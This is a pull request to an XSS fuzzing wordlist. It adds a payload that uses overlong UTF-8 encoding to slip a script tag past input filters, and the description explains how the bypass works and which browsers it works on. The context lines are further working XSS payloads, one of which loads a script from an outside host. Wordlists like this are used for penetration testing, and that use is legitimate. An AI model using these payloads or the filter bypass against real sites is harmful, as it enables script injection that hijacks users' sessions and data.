### PR TITLE
Update XSS-Fuzzing

### DIFF
--- a/Fuzzing/XSS-Fuzzing
+++ b/Fuzzing/XSS-Fuzzing
@@ -3804,3 +3804,4 @@ Set.constructor`alert\x28document.domain\x29```
 <IMG SRC="javascript:alert('XSS');">
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
 <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
+%C0%BCscript%C0%A0src%C0%BD%C0%82mymethod%C0%A8%C0%A9%C0%82%C0%A0%C0%AF%C0%BE


### PR DESCRIPTION
Using overlong utf8 encoding or illegal characters to bypass filters which works on servers or web applications that decode overlong characters. This string when decoded is the equivalent of <script src="mymethod()" /> - This is valid on old mobile phone browsers, legacy browsers and niche browsers